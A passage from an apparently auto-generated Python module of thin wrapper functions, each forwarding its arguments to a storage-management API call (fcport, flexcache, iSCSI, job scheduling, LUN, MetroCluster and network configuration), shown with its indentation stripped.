return api_call
def fcport_get_link_state(*args):
api_call = _invoke_api('fcport-get-link-state', *args)
return api_call
def feature_status_list_info(*args):
api_call = _invoke_api('feature-status-list-info', *args)
return api_call
def feature_usage_get_iter(*args):
api_call = _invoke_api('feature-usage-get-iter', *args)
return api_call
def feature_usage_summary_get_iter(*args):
api_call = _invoke_api('feature-usage-summary-get-iter', *args)
return api_call
def file_assign_qos(*args):
api_call = _invoke_api('file-assign-qos', *args)
return api_call
def file_copy_destroy(*args):
api_call = _invoke_api('file-copy-destroy', *args)
return api_call
def file_copy_get_iter(*args):
api_call = _invoke_api('file-copy-get-iter', *args)
return api_call
def file_copy_start(*args):
api_call = _invoke_api('file-copy-start', *args)
return api_call
def file_directory_security_ntfs_dacl_get_iter(*args):
api_call = _invoke_api('file-directory-security-ntfs-dacl-get-iter', *args)
return api_call
def file_directory_security_ntfs_get_iter(*args):
api_call = _invoke_api('file-directory-security-ntfs-get-iter', *args)
return api_call
def file_directory_security_ntfs_sacl_get_iter(*args):
api_call = _invoke_api('file-directory-security-ntfs-sacl-get-iter', *args)
return api_call
def file_directory_security_policy_get_iter(*args):
api_call = _invoke_api('file-directory-security-policy-get-iter', *args)
return api_call
def file_directory_security_policy_task_get_iter(*args):
api_call = _invoke_api('file-directory-security-policy-task-get-iter', *args)
return api_call
def file_move_destroy(*args):
api_call = _invoke_api('file-move-destroy', *args)
return api_call
def file_move_get_iter(*args):
api_call = _invoke_api('file-move-get-iter', *args)
return api_call
def file_move_start(*args):
api_call = _invoke_api('file-move-start', *args)
return api_call
def fileservice_audit_config_get_iter(*args):
api_call = _invoke_api('fileservice-audit-config-get-iter', *args)
return api_call
def fileservice_audit_config_get_total_records(*args):
api_call = _invoke_api('fileservice-audit-config-get-total-records', *args)
return api_call
def flash_device_get_iter(*args):
api_call = _invoke_api('flash-device-get-iter', *args)
return api_call
def flash_device_list_info(*args):
api_call = _invoke_api('flash-device-list-info', *args)
return api_call
def flash_get_thresholds(*args):
api_call = _invoke_api('flash-get-thresholds', *args)
return api_call
def flash_thresholds_get_iter(*args):
api_call = _invoke_api('flash-thresholds-get-iter', *args)
return api_call
def flexcache_cache_policy_create(*args):
api_call = _invoke_api('flexcache-cache-policy-create', *args)
return api_call
def flexcache_cache_policy_destroy(*args):
api_call = _invoke_api('flexcache-cache-policy-destroy', *args)
return api_call
def flexcache_cache_policy_get(*args):
api_call = _invoke_api('flexcache-cache-policy-get', *args)
return api_call
def flexcache_cache_policy_get_iter(*args):
api_call = _invoke_api('flexcache-cache-policy-get-iter', *args)
return api_call
def flexcache_cache_policy_modify(*args):
api_call = _invoke_api('flexcache-cache-policy-modify', *args)
return api_call
def flexcache_create(*args):
api_call = _invoke_api('flexcache-create', *args)
return api_call
def flexcache_delete(*args):
api_call = _invoke_api('flexcache-delete', *args)
return api_call
def flexcache_get_iter(*args):
api_call = _invoke_api('flexcache-get-iter', *args)
return api_call
def fpolicy_passthrough_read_connection_get_iter(*args):
api_call = _invoke_api('fpolicy-passthrough-read-connection-get-iter', *args)
return api_call
def fpolicy_policy_event_get_iter(*args):
api_call = _invoke_api('fpolicy-policy-event-get-iter', *args)
return api_call
def fpolicy_policy_external_engine_get_iter(*args):
api_call = _invoke_api('fpolicy-policy-external-engine-get-iter', *args)
return api_call
def fpolicy_policy_get_iter(*args):
api_call = _invoke_api('fpolicy-policy-get-iter', *args)
return api_call
def fpolicy_policy_scope_get_iter(*args):
api_call = _invoke_api('fpolicy-policy-scope-get-iter', *args)
return api_call
def fpolicy_policy_status_get_iter(*args):
api_call = _invoke_api('fpolicy-policy-status-get-iter', *args)
return api_call
def fpolicy_server_status_get_iter(*args):
api_call = _invoke_api('fpolicy-server-status-get-iter', *args)
return api_call
def gpo_applied_info_get_iter(*args):
api_call = _invoke_api('gpo-applied-info-get-iter', *args)
return api_call
def gpo_get_iter(*args):
api_call = _invoke_api('gpo-get-iter', *args)
return api_call
def gpo_gpresult_info_get_iter(*args):
api_call = _invoke_api('gpo-gpresult-info-get-iter', *args)
return api_call
def gpo_restricted_group_applied_info_get_iter(*args):
api_call = _invoke_api('gpo-restricted-group-applied-info-get-iter', *args)
return api_call
def gpo_restricted_group_defined_info_get_iter(*args):
api_call = _invoke_api('gpo-restricted-group-defined-info-get-iter', *args)
return api_call
def group_mapping_get_iter(*args):
api_call = _invoke_api('group-mapping-get-iter', *args)
return api_call
def igroup_disable_aix_support(*args):
api_call = _invoke_api('igroup-disable-aix-support', *args)
return api_call
def igroup_get_iter(*args):
api_call = _invoke_api('igroup-get-iter', *args)
return api_call
def igroup_os_type_list(*args):
api_call = _invoke_api('igroup-os-type-list', *args)
return api_call
def interim_license_list_get(*args):
api_call = _invoke_api('interim-license-list-get', *args)
return api_call
def interim_license_remove(*args):
api_call = _invoke_api('interim-license-remove', *args)
return api_call
def interim_license_set(*args):
api_call = _invoke_api('interim-license-set', *args)
return api_call
def iscsi_connection_get_iter(*args):
api_call = _invoke_api('iscsi-connection-get-iter', *args)
return api_call
def iscsi_initiator_auth_get_iter(*args):
api_call = _invoke_api('iscsi-initiator-auth-get-iter', *args)
return api_call
def iscsi_initiator_get_iter(*args):
api_call = _invoke_api('iscsi-initiator-get-iter', *args)
return api_call
def iscsi_interface_accesslist_get_iter(*args):
api_call = _invoke_api('iscsi-interface-accesslist-get-iter', *args)
return api_call
def iscsi_interface_get_iter(*args):
api_call = _invoke_api('iscsi-interface-get-iter', *args)
return api_call
def iscsi_isns_get_iter(*args):
api_call = _invoke_api('iscsi-isns-get-iter', *args)
return api_call
def iscsi_service_get_iter(*args):
api_call = _invoke_api('iscsi-service-get-iter', *args)
return api_call
def iscsi_session_get_iter(*args):
api_call = _invoke_api('iscsi-session-get-iter', *args)
return api_call
def iscsi_stats_get_iter(*args):
api_call = _invoke_api('iscsi-stats-get-iter', *args)
return api_call
def iscsi_tpgroup_get_iter(*args):
api_call = _invoke_api('iscsi-tpgroup-get-iter', *args)
return api_call
def job_bad_erase(*args):
api_call = _invoke_api('job-bad-erase', *args)
return api_call
def job_bad_get_iter(*args):
api_call = _invoke_api('job-bad-get-iter', *args)
return api_call
def job_by_node_get_iter(*args):
api_call = _invoke_api('job-by-node-get-iter', *args)
return api_call
def job_completed_get_iter(*args):
api_call = _invoke_api('job-completed-get-iter', *args)
return api_call
def job_delete_iter(*args):
api_call = _invoke_api('job-delete-iter', *args)
return api_call
def job_expunge_iter(*args):
api_call = _invoke_api('job-expunge-iter', *args)
return api_call
def job_get_iter(*args):
api_call = _invoke_api('job-get-iter', *args)
return api_call
def job_history_get_iter(*args):
api_call = _invoke_api('job-history-get-iter', *args)
return api_call
def job_init_state_get(*args):
api_call = _invoke_api('job-init-state-get', *args)
return api_call
def job_init_state_get_iter(*args):
api_call = _invoke_api('job-init-state-get-iter', *args)
return api_call
def job_kick(*args):
api_call = _invoke_api('job-kick', *args)
return api_call
def job_pause_iter(*args):
api_call = _invoke_api('job-pause-iter', *args)
return api_call
def job_private_completed_get_iter(*args):
api_call = _invoke_api('job-private-completed-get-iter', *args)
return api_call
def job_private_delete_iter(*args):
api_call = _invoke_api('job-private-delete-iter', *args)
return api_call
def job_private_get_iter(*args):
api_call = _invoke_api('job-private-get-iter', *args)
return api_call
def job_private_pause_iter(*args):
api_call = _invoke_api('job-private-pause-iter', *args)
return api_call
def job_private_resume_iter(*args):
api_call = _invoke_api('job-private-resume-iter', *args)
return api_call
def job_private_soft_pause_iter(*args):
api_call = _invoke_api('job-private-soft-pause-iter', *args)
return api_call
def job_private_stop_iter(*args):
api_call = _invoke_api('job-private-stop-iter', *args)
return api_call
def job_queue_get(*args):
api_call = _invoke_api('job-queue-get', *args)
return api_call
def job_queue_get_iter(*args):
api_call = _invoke_api('job-queue-get-iter', *args)
return api_call
def job_resume_iter(*args):
api_call = _invoke_api('job-resume-iter', *args)
return api_call
def job_schedule_consumer_get(*args):
api_call = _invoke_api('job-schedule-consumer-get', *args)
return api_call
def job_schedule_consumer_get_iter(*args):
api_call = _invoke_api('job-schedule-consumer-get-iter', *args)
return api_call
def job_schedule_cron_create(*args):
api_call = _invoke_api('job-schedule-cron-create', *args)
return api_call
def job_schedule_cron_destroy(*args):
api_call = _invoke_api('job-schedule-cron-destroy', *args)
return api_call
def job_schedule_cron_destroy_iter(*args):
api_call = _invoke_api('job-schedule-cron-destroy-iter', *args)
return api_call
def job_schedule_cron_get(*args):
api_call = _invoke_api('job-schedule-cron-get', *args)
return api_call
def job_schedule_cron_get_iter(*args):
api_call = _invoke_api('job-schedule-cron-get-iter', *args)
return api_call
def job_schedule_cron_modify(*args):
api_call = _invoke_api('job-schedule-cron-modify', *args)
return api_call
def job_schedule_get(*args):
api_call = _invoke_api('job-schedule-get', *args)
return api_call
def job_schedule_get_iter(*args):
api_call = _invoke_api('job-schedule-get-iter', *args)
return api_call
def job_schedule_interval_create(*args):
api_call = _invoke_api('job-schedule-interval-create', *args)
return api_call
def job_schedule_interval_destroy(*args):
api_call = _invoke_api('job-schedule-interval-destroy', *args)
return api_call
def job_schedule_interval_destroy_iter(*args):
api_call = _invoke_api('job-schedule-interval-destroy-iter', *args)
return api_call
def job_schedule_interval_get(*args):
api_call = _invoke_api('job-schedule-interval-get', *args)
return api_call
def job_schedule_interval_get_iter(*args):
api_call = _invoke_api('job-schedule-interval-get-iter', *args)
return api_call
def job_schedule_interval_modify(*args):
api_call = _invoke_api('job-schedule-interval-modify', *args)
return api_call
def job_soft_pause_iter(*args):
api_call = _invoke_api('job-soft-pause-iter', *args)
return api_call
def job_stop_iter(*args):
api_call = _invoke_api('job-stop-iter', *args)
return api_call
def job_type_by_category_get(*args):
api_call = _invoke_api('job-type-by-category-get', *args)
return api_call
def job_type_by_category_get_iter(*args):
api_call = _invoke_api('job-type-by-category-get-iter', *args)
return api_call
def job_type_get(*args):
api_call = _invoke_api('job-type-get', *args)
return api_call
def job_type_get_iter(*args):
api_call = _invoke_api('job-type-get-iter', *args)
return api_call
def job_unclaim_iter(*args):
api_call = _invoke_api('job-unclaim-iter', *args)
return api_call
def kerberos_config_get_iter(*args):
api_call = _invoke_api('kerberos-config-get-iter', *args)
return api_call
def kerberos_realm_create(*args):
api_call = _invoke_api('kerberos-realm-create', *args)
return api_call
def kerberos_realm_delete(*args):
api_call = _invoke_api('kerberos-realm-delete', *args)
return api_call
def kerberos_realm_get_iter(*args):
api_call = _invoke_api('kerberos-realm-get-iter', *args)
return api_call
def kerberos_realm_modify(*args):
api_call = _invoke_api('kerberos-realm-modify', *args)
return api_call
def ldap_client_get_iter(*args):
api_call = _invoke_api('ldap-client-get-iter', *args)
return api_call
def ldap_client_schema_get_iter(*args):
api_call = _invoke_api('ldap-client-schema-get-iter', *args)
return api_call
def ldap_config_get_iter(*args):
api_call = _invoke_api('ldap-config-get-iter', *args)
return api_call
def license_v2_add(*args):
api_call = _invoke_api('license-v2-add', *args)
return api_call
def license_v2_cleanup_list_info(*args):
api_call = _invoke_api('license-v2-cleanup-list-info', *args)
return api_call
def license_v2_delete(*args):
api_call = _invoke_api('license-v2-delete', *args)
return api_call
def license_v2_delete_expired(*args):
api_call = _invoke_api('license-v2-delete-expired', *args)
return api_call
def license_v2_delete_unused(*args):
api_call = _invoke_api('license-v2-delete-unused', *args)
return api_call
def license_v2_entitlement_risk_get_iter(*args):
api_call = _invoke_api('license-v2-entitlement-risk-get-iter', *args)
return api_call
def license_v2_list_info(*args):
api_call = _invoke_api('license-v2-list-info', *args)
return api_call
def license_v2_status_list_info(*args):
api_call = _invoke_api('license-v2-status-list-info', *args)
return api_call
def lock_break_iter(*args):
api_call = _invoke_api('lock-break-iter', *args)
return api_call
def lock_get_iter(*args):
api_call = _invoke_api('lock-get-iter', *args)
return api_call
def lun_alignment_get_iter(*args):
api_call = _invoke_api('lun-alignment-get-iter', *args)
return api_call
def lun_bind_get_iter(*args):
api_call = _invoke_api('lun-bind-get-iter', *args)
return api_call
def lun_copy_cancel(*args):
api_call = _invoke_api('lun-copy-cancel', *args)
return api_call
def lun_copy_get_iter(*args):
api_call = _invoke_api('lun-copy-get-iter', *args)
return api_call
def lun_copy_modify(*args):
api_call = _invoke_api('lun-copy-modify', *args)
return api_call
def lun_copy_pause(*args):
api_call = _invoke_api('lun-copy-pause', *args)
return api_call
def lun_copy_resume(*args):
api_call = _invoke_api('lun-copy-resume', *args)
return api_call
def lun_copy_start(*args):
api_call = _invoke_api('lun-copy-start', *args)
return api_call
def lun_debug_get(*args):
api_call = _invoke_api('lun-debug-get', *args)
return api_call
def lun_get_iter(*args):
api_call = _invoke_api('lun-get-iter', *args)
return api_call
def lun_get_vdisk_attributes(*args):
api_call = _invoke_api('lun-get-vdisk-attributes', *args)
return api_call
def lun_group_internal_rebuild(*args):
api_call = _invoke_api('lun-group-internal-rebuild', *args)
return api_call
def lun_import_create(*args):
api_call = _invoke_api('lun-import-create', *args)
return api_call
def lun_import_delete(*args):
api_call = _invoke_api('lun-import-delete', *args)
return api_call
def lun_import_get_iter(*args):
api_call = _invoke_api('lun-import-get-iter', *args)
return api_call
def lun_import_pause(*args):
api_call = _invoke_api('lun-import-pause', *args)
return api_call
def lun_import_resume(*args):
api_call = _invoke_api('lun-import-resume', *args)
return api_call
def lun_import_start(*args):
api_call = _invoke_api('lun-import-start', *args)
return api_call
def lun_import_stop(*args):
api_call = _invoke_api('lun-import-stop', *args)
return api_call
def lun_import_throttle(*args):
api_call = _invoke_api('lun-import-throttle', *args)
return api_call
def lun_import_verify_start(*args):
api_call = _invoke_api('lun-import-verify-start', *args)
return api_call
def lun_import_verify_stop(*args):
api_call = _invoke_api('lun-import-verify-stop', *args)
return api_call
def lun_initiator_list_map_info(*args):
api_call = _invoke_api('lun-initiator-list-map-info', *args)
return api_call
def lun_map_get_iter(*args):
api_call = _invoke_api('lun-map-get-iter', *args)
return api_call
def lun_move_get_iter(*args):
api_call = _invoke_api('lun-move-get-iter', *args)
return api_call
def lun_os_type_list(*args):
api_call = _invoke_api('lun-os-type-list', *args)
return api_call
def lun_prepare_to_downgrade(*args):
api_call = _invoke_api('lun-prepare-to-downgrade', *args)
return api_call
def lun_stats_get_iter(*args):
api_call = _invoke_api('lun-stats-get-iter', *args)
return api_call
def lun_test_vdisk_size(*args):
api_call = _invoke_api('lun-test-vdisk-size', *args)
return api_call
def lun_transition_7mode_destroy(*args):
api_call = _invoke_api('lun-transition-7mode-destroy', *args)
return api_call
def lun_transition_7mode_get_iter(*args):
api_call = _invoke_api('lun-transition-7mode-get-iter', *args)
return api_call
def lun_transition_start(*args):
api_call = _invoke_api('lun-transition-start', *args)
return api_call
def lun_transition_volume_get_iter(*args):
api_call = _invoke_api('lun-transition-volume-get-iter', *args)
return api_call
def memoryperf_run(*args):
api_call = _invoke_api('memoryperf-run', *args)
return api_call
def method_for_key_optionality_default(*args):
api_call = _invoke_api('method-for-key-optionality-default', *args)
return api_call
def metrocluster_check_aggregate_eligibility_get(*args):
api_call = _invoke_api('metrocluster-check-aggregate-eligibility-get', *args)
return api_call
def metrocluster_check_aggregate_eligibility_get_iter(*args):
api_call = _invoke_api('metrocluster-check-aggregate-eligibility-get-iter', *args)
return api_call
def metrocluster_check_aggregate_get_iter(*args):
api_call = _invoke_api('metrocluster-check-aggregate-get-iter', *args)
return api_call
def metrocluster_check_capture_status_get(*args):
api_call = _invoke_api('metrocluster-check-capture-status-get', *args)
return api_call
def metrocluster_check_cluster_get_iter(*args):
api_call = _invoke_api('metrocluster-check-cluster-get-iter', *args)
return api_call
def metrocluster_check_config_replication_get(*args):
api_call = _invoke_api('metrocluster-check-config-replication-get', *args)
return api_call
def metrocluster_check_get_iter(*args):
api_call = _invoke_api('metrocluster-check-get-iter', *args)
return api_call
def metrocluster_check_lif_repair_placement(*args):
api_call = _invoke_api('metrocluster-check-lif-repair-placement', *args)
return api_call
def metrocluster_check_node_get_iter(*args):
api_call = _invoke_api('metrocluster-check-node-get-iter', *args)
return api_call
def metrocluster_check_run(*args):
api_call = _invoke_api('metrocluster-check-run', *args)
return api_call
def metrocluster_config_diff_get(*args):
api_call = _invoke_api('metrocluster-config-diff-get', *args)
return api_call
def metrocluster_config_diff_get_iter(*args):
api_call = _invoke_api('metrocluster-config-diff-get-iter', *args)
return api_call
def metrocluster_config_replication_cluster_storage_configuration_get(*args):
api_call = _invoke_api('metrocluster-config-replication-cluster-storage-configuration-get', *args)
return api_call
def metrocluster_config_replication_cluster_storage_configuration_modify(*args):
api_call = _invoke_api('metrocluster-config-replication-cluster-storage-configuration-modify', *args)
return api_call
def metrocluster_config_replication_resync_status_get(*args):
api_call = _invoke_api('metrocluster-config-replication-resync-status-get', *args)
return api_call
def metrocluster_configure(*args):
api_call = _invoke_api('metrocluster-configure', *args)
return api_call
def metrocluster_disable(*args):
api_call = _invoke_api('metrocluster-disable', *args)
return api_call
def metrocluster_get(*args):
api_call = _invoke_api('metrocluster-get', *args)
return api_call
def metrocluster_heal(*args):
api_call = _invoke_api('metrocluster-heal', *args)
return api_call
def metrocluster_interconnect_adapter_auto_reset_on_error_modify(*args):
api_call = _invoke_api('metrocluster-interconnect-adapter-auto-reset-on-error-modify', *args)
return api_call
def metrocluster_interconnect_adapter_get_iter(*args):
api_call = _invoke_api('metrocluster-interconnect-adapter-get-iter', *args)
return api_call
def metrocluster_interconnect_adapter_modify(*args):
api_call = _invoke_api('metrocluster-interconnect-adapter-modify', *args)
return api_call
def metrocluster_interconnect_adapter_reset(*args):
api_call = _invoke_api('metrocluster-interconnect-adapter-reset', *args)
return api_call
def metrocluster_interconnect_mirror_get_iter(*args):
api_call = _invoke_api('metrocluster-interconnect-mirror-get-iter', *args)
return api_call
def metrocluster_interconnect_mirror_modify(*args):
api_call = _invoke_api('metrocluster-interconnect-mirror-modify', *args)
return api_call
def metrocluster_interconnect_mirror_multipath_get_iter(*args):
api_call = _invoke_api('metrocluster-interconnect-mirror-multipath-get-iter', *args)
return api_call
def metrocluster_is_configured(*args):
api_call = _invoke_api('metrocluster-is-configured', *args)
return api_call
def metrocluster_node_get_iter(*args):
api_call = _invoke_api('metrocluster-node-get-iter', *args)
return api_call
def metrocluster_operation_get_iter(*args):
api_call = _invoke_api('metrocluster-operation-get-iter', *args)
return api_call
def metrocluster_progress_table_get_iter(*args):
api_call = _invoke_api('metrocluster-progress-table-get-iter', *args)
return api_call
def metrocluster_show_lif_placement_failures_get_iter(*args):
api_call = _invoke_api('metrocluster-show-lif-placement-failures-get-iter', *args)
return api_call
def metrocluster_switchback(*args):
api_call = _invoke_api('metrocluster-switchback', *args)
return api_call
def metrocluster_switchover(*args):
api_call = _invoke_api('metrocluster-switchover', *args)
return api_call
def metrocluster_tracelog_dump(*args):
api_call = _invoke_api('metrocluster-tracelog-dump', *args)
return api_call
def metrocluster_unconfigure(*args):
api_call = _invoke_api('metrocluster-unconfigure', *args)
return api_call
def metrocluster_vserver_get_iter(*args):
api_call = _invoke_api('metrocluster-vserver-get-iter', *args)
return api_call
def metrocluster_vserver_resync(*args):
api_call = _invoke_api('metrocluster-vserver-resync', *args)
return api_call
def name_mapping_get_iter(*args):
api_call = _invoke_api('name-mapping-get-iter', *args)
return api_call
def name_mapping_unix_group_get_iter(*args):
api_call = _invoke_api('name-mapping-unix-group-get-iter', *args)
return api_call
def name_mapping_unix_user_get_iter(*args):
api_call = _invoke_api('name-mapping-unix-user-get-iter', *args)
return api_call
def name_service_dns_statistics_get_iter(*args):
api_call = _invoke_api('name-service-dns-statistics-get-iter', *args)
return api_call
def name_service_nis_binding_detail_get_iter(*args):
api_call = _invoke_api('name-service-nis-binding-detail-get-iter', *args)
return api_call
def name_service_nis_show_bound_iter(*args):
api_call = _invoke_api('name-service-nis-show-bound-iter', *args)
return api_call
def name_service_nis_statistics_get_iter(*args):
api_call = _invoke_api('name-service-nis-statistics-get-iter', *args)
return api_call
def name_service_unix_group_limits_get(*args):
api_call = _invoke_api('name-service-unix-group-limits-get', *args)
return api_call
def name_service_unix_user_limits_get(*args):
api_call = _invoke_api('name-service-unix-user-limits-get', *args)
return api_call
def nameservice_dns_statistics_clear(*args):
api_call = _invoke_api('nameservice-dns-statistics-clear', *args)
return api_call
def nameservice_get_hostname_from_ipv4(*args):
api_call = _invoke_api('nameservice-get-hostname-from-ipv4', *args)
return api_call
def nameservice_get_ip_from_hostname(*args):
api_call = _invoke_api('nameservice-get-ip-from-hostname', *args)
return api_call
def nameservice_get_ipv4_from_hostname(*args):
api_call = _invoke_api('nameservice-get-ipv4-from-hostname', *args)
return api_call
def nameservice_nis_statistics_clear(*args):
api_call = _invoke_api('nameservice-nis-statistics-clear', *args)
return api_call
def nameservice_nsswitch_get_iter(*args):
api_call = _invoke_api('nameservice-nsswitch-get-iter', *args)
return api_call
def net_active_routes_get_iter(*args):
api_call = _invoke_api('net-active-routes-get-iter', *args)
return api_call
def net_arp_active_entry_destroy(*args):
api_call = _invoke_api('net-arp-active-entry-destroy', *args)
return api_call
def net_arp_active_entry_get(*args):
api_call = _invoke_api('net-arp-active-entry-get', *args)
return api_call
def net_arp_active_entry_get_iter(*args):
api_call = _invoke_api('net-arp-active-entry-get-iter', *args)
return api_call
def net_arp_create(*args):
api_call = _invoke_api('net-arp-create', *args)
return api_call
def net_arp_destroy(*args):
api_call = _invoke_api('net-arp-destroy', *args)
return api_call
def net_arp_get(*args):
api_call = _invoke_api('net-arp-get', *args)
return api_call
def net_arp_get_iter(*args):
api_call = _invoke_api('net-arp-get-iter', *args)
return api_call
def net_check_failover(*args):
api_call = _invoke_api('net-check-failover', *args)
return api_call
def net_cluster_ping(*args):
api_call = _invoke_api('net-cluster-ping', *args)
return api_call
def net_cluster_ping6(*args):
api_call = _invoke_api('net-cluster-ping6', *args)
return api_call
def net_connections_receive_window_size_get(*args):
api_call = _invoke_api('net-connections-receive-window-size-get', *args)
return api_call
def net_connections_receive_window_size_get_iter(*args):
api_call = _invoke_api('net-connections-receive-window-size-get-iter', *args)
return api_call
def net_connections_receive_window_size_modify(*args):
api_call = _invoke_api('net-connections-receive-window-size-modify', *args)
return api_call
def net_ddns_get_iter(*args):
api_call = _invoke_api('net-ddns-get-iter', *args)
return api_call
def net_device_discovery_get_iter(*args):
api_call = _invoke_api('net-device-discovery-get-iter', *args)
return api_call
def net_disable_readonly(*args):
api_call = _invoke_api('net-disable-readonly', *args)
return api_call
def net_dns_get_iter(*args):
api_call = _invoke_api('net-dns-get-iter', *args)
return api_call
def net_enable_readonly(*args):
api_call = _invoke_api('net-enable-readonly', *args)
return api_call
def net_failover_group_add_targets(*args):
api_call = _invoke_api('net-failover-group-add-targets', *args)
return api_call
def net_failover_group_create(*args):
api_call = _invoke_api('net-failover-group-create', *args)
return api_call
def net_failover_group_destroy(*args):
api_call = _invoke_api('net-failover-group-destroy', *args)
return api_call
def net_failover_group_get_iter(*args):
api_call = _invoke_api('net-failover-group-get-iter', *args)
return api_call
def net_failover_group_modify(*args):
api_call = _invoke_api('net-failover-group-modify', *args)
return api_call
def net_failover_group_remove_targets(*args):
api_call = _invoke_api('net-failover-group-remove-targets', *args)
return api_call
def net_failover_group_rename(*args):
api_call = _invoke_api('net-failover-group-rename', *args)
return api_call
def net_firewall_config_get(*args):
api_call = _invoke_api('net-firewall-config-get', *args)
return api_call
def net_firewall_config_get_iter(*args):
api_call = _invoke_api('net-firewall-config-get-iter', *args)
return api_call
def net_firewall_config_modify(*args):
api_call = _invoke_api('net-firewall-config-modify', *args)
return api_call
def net_firewall_config_modify_iter(*args):
api_call = _invoke_api('net-firewall-config-modify-iter', *args)
return api_call
def net_firewall_policy_create(*args):
api_call = _invoke_api('net-firewall-policy-create', *args)
return api_call
def net_firewall_policy_destroy(*args):
api_call = _invoke_api('net-firewall-policy-destroy', *args)
return api_call
def net_firewall_policy_get_iter(*args):
api_call = _invoke_api('net-firewall-policy-get-iter', *args)
return api_call
def net_firewall_policy_modify(*args):
api_call = _invoke_api('net-firewall-policy-modify', *args)
return api_call
def net_hosts_get_iter(*args):
api_call = _invoke_api('net-hosts-get-iter', *args)
return api_call
def net_interface_create(*args):
api_call = _invoke_api('net-interface-create', *args)
return api_call
def net_interface_delete(*args):
api_call = _invoke_api('net-interface-delete', *args)
return api_call
def net_interface_get_iter(*args):
api_call = _invoke_api('net-interface-get-iter', *args)
return api_call
def net_interface_migrate(*args):
api_call = _invoke_api('net-interface-migrate', *args)
return api_call
def net_interface_modify(*args):
api_call = _invoke_api('net-interface-modify', *args)
return api_call
def net_interface_modify_iter(*args):
api_call = _invoke_api('net-interface-modify-iter', *args)
return api_call
def net_interface_revert(*args):
api_call = _invoke_api('net-interface-revert', *args)
return api_call
def net_ipspaces_assign_vserver(*args):
api_call = _invoke_api('net-ipspaces-assign-vserver', *args)
return api_call
def net_ipspaces_create(*args):
api_call = _invoke_api('net-ipspaces-create', *args)
return api_call
def net_ipspaces_destroy(*args):
api_call = _invoke_api('net-ipspaces-destroy', *args)
return api_call
def net_ipspaces_get(*args):
api_call = _invoke_api('net-ipspaces-get', *args)
return api_call
def net_ipspaces_get_iter(*args):
api_call = _invoke_api('net-ipspaces-get-iter', *args)
return api_call
def net_ipspaces_rename(*args):
api_call = _invoke_api('net-ipspaces-rename', *args)
return api_call
def net_ndp_active_neighbor_destroy(*args):
api_call = _invoke_api('net-ndp-active-neighbor-destroy', *args)
return api_call
def net_ndp_active_neighbor_get(*args):
api_call = _invoke_api('net-ndp-active-neighbor-get', *args)
return api_call
def net_ndp_active_neighbor_get_iter(*args):
api_call = _invoke_api('net-ndp-active-neighbor-get-iter', *args)
return api_call
def net_ndp_default_router_delete_all(*args):
api_call = _invoke_api('net-ndp-default-router-delete-all', *args)
return api_call
def net_ndp_default_router_get(*args):
api_call = _invoke_api('net-ndp-default-router-get', *args)
return api_call
def net_ndp_default_router_get_iter(*args):
api_call = _invoke_api('net-ndp-default-router-get-iter', *args)
return api_call
def net_ndp_neighbor_get_iter(*args):
api_call = _invoke_api('net-ndp-neighbor-get-iter', *args)
return api_call
def net_ndp_prefix_delete_all(*args):
api_call = _invoke_api('net-ndp-prefix-delete-all', *args)
return api_call
def net_ndp_prefix_get(*args):
api_call = _invoke_api('net-ndp-prefix-get', *args)
return api_call
def net_ndp_prefix_get_iter(*args):
api_call = _invoke_api('net-ndp-prefix-get-iter', *args)
return api_call
def net_options_get(*args):
api_call = _invoke_api('net-options-get', *args)
return api_call
def net_options_modify(*args):
api_call = _invoke_api('net-options-modify', *args)
return api_call
def net_placement_cache_delete(*args):
api_call = _invoke_api('net-placement-cache-delete', *args)
return api_call
def net_placement_cache_get_iter(*args):
api_call = _invoke_api('net-placement-cache-get-iter', *args)
return api_call
def net_placement_discover(*args):
api_call = _invoke_api('net-placement-discover', *args)
return api_call
def net_port_broadcast_domain_add_ports(*args):
api_call = _invoke_api('net-port-broadcast-domain-add-ports', *args)
return api_call
def net_port_broadcast_domain_create(*args):
api_call = _invoke_api('net-port-broadcast-domain-create', *args)
return api_call
def net_port_broadcast_domain_destroy(*args):
api_call = _invoke_api('net-port-broadcast-domain-destroy', *args)
return api_call
def net_port_broadcast_domain_get(*args):
api_call = _invoke_api('net-port-broadcast-domain-get', *args)
return api_call
def net_port_broadcast_domain_get_iter(*args):
api_call = _invoke_api('net-port-broadcast-domain-get-iter', *args)
return api_call
def net_port_broadcast_domain_merge(*args):
api_call = _invoke_api('net-port-broadcast-domain-merge', *args)
return api_call
def net_port_broadcast_domain_modify(*args):
api_call = _invoke_api('net-port-broadcast-domain-modify', *args)
return api_call
def net_port_broadcast_domain_remove_ports(*args):
api_call = _invoke_api('net-port-broadcast-domain-remove-ports', *args)
return api_call
def net_port_broadcast_domain_rename(*args):
api_call = _invoke_api('net-port-broadcast-domain-rename', *args)
return api_call
def net_port_broadcast_domain_split(*args):
api_call = _invoke_api('net-port-broadcast-domain-split', *args)
return api_call
def net_port_delete(*args):
api_call = _invoke_api('net-port-delete', *args)
return api_call
def net_port_get(*args):
api_call = _invoke_api('net-port-get', *args)
return api_call
def net_port_get_iter(*args):
api_call = _invoke_api('net-port-get-iter', *args)
return api_call
def net_port_ifgrp_add_port(*args):
api_call = _invoke_api('net-port-ifgrp-add-port', *args)
return api_call
def net_port_ifgrp_create(*args):
api_call = _invoke_api('net-port-ifgrp-create', *args)
return api_call
def net_port_ifgrp_destroy(*args):
api_call = _invoke_api('net-port-ifgrp-destroy', *args)
return api_call
def net_port_ifgrp_get(*args):
api_call = _invoke_api('net-port-ifgrp-get', *args)
return api_call
def net_port_ifgrp_remove_port(*args):
api_call = _invoke_api('net-port-ifgrp-remove-port', *args)
return api_call
def net_port_modify(*args):
api_call = _invoke_api('net-port-modify', *args)
return api_call
def net_port_modify_iter(*args):
api_call = _invoke_api('net-port-modify-iter', *args)
return api_call
def net_routes_get_iter(*args):
api_call = _invoke_api('net-routes-get-iter', *args)
return api_call
def net_routes_lifs_get_iter(*args):
api_call = _invoke_api('net-routes-lifs-get-iter', *args)
return api_call
def net_routing_group_route_create(*args):
api_call = _invoke_api('net-routing-group-route-create', *args)
return api_call
def net_routing_group_route_destroy(*args):
api_call = _invoke_api('net-routing-group-route-destroy', *args)
return api_call
def net_routing_group_route_get_iter(*args):
api_call = _invoke_api('net-routing-group-route-get-iter', *args)
return api_call
def net_san_lif_placement_get(*args):
api_call = _invoke_api('net-san-lif-placement-get', *args)
return api_call
def net_subnet_add_ranges(*args):
api_call = _invoke_api('net-subnet-add-ranges', *args)
return api_call
def net_subnet_create(*args):
api_call = _invoke_api('net-subnet-create', *args)
return api_call
def net_subnet_destroy(*args):
api_call = _invoke_api('net-subnet-destroy', *args)
return api_call
def net_subnet_get(*args):
api_call = _invoke_api('net-subnet-get', *args)
return api_call
def net_subnet_get_iter(*args):
